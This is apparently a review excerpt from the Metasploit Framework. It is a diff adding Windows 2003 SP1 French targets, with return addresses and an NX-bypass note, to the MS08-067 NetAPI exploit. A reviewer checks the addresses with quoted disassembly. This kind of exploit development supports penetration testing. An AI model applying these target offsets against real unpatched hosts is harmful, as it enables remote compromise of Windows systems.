modules/exploits/windows/smb/ms08_067_netapi.rb

```diff
@@ -621,6 +621,26 @@ def initialize(info = {})
              'Scratch'   => 0x00020408,
            }
           ],
+          # Standard return-to-ESI without NX bypass
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP1 French (NO NX)',
+            {
+              'Ret'       => 0x71ac1c40 ,
+              'Scratch'   => 0x00020408,
+            }
+          ], # JMP ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP1
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP1 French (NX)',
```

Comment:
I've installed  Windows 2003 SP1 French machine

It's what I see on shell32.dll 6.0.3790.1830

* 7CA2568B

```
.text:7CA2568B                 jmp     loc_7CA219DE    ; jumptable 7CA22CE3 default case
```

* 0x7CB47CF4

```
.text:7CB47CF0                 mov     eax, 56000000h
.text:7CB47CF5
.text:7CB47CF5 loc_7CB47CF5:                           ; CODE XREF: sub_7CB47CE4+Aj
.text:7CB47CF5                 pop     ebp
.text:7CB47CF6                 retn    4
```

The netapi32.dll version installed is 5.2.3790.1830 so should be vulnerable I guess :)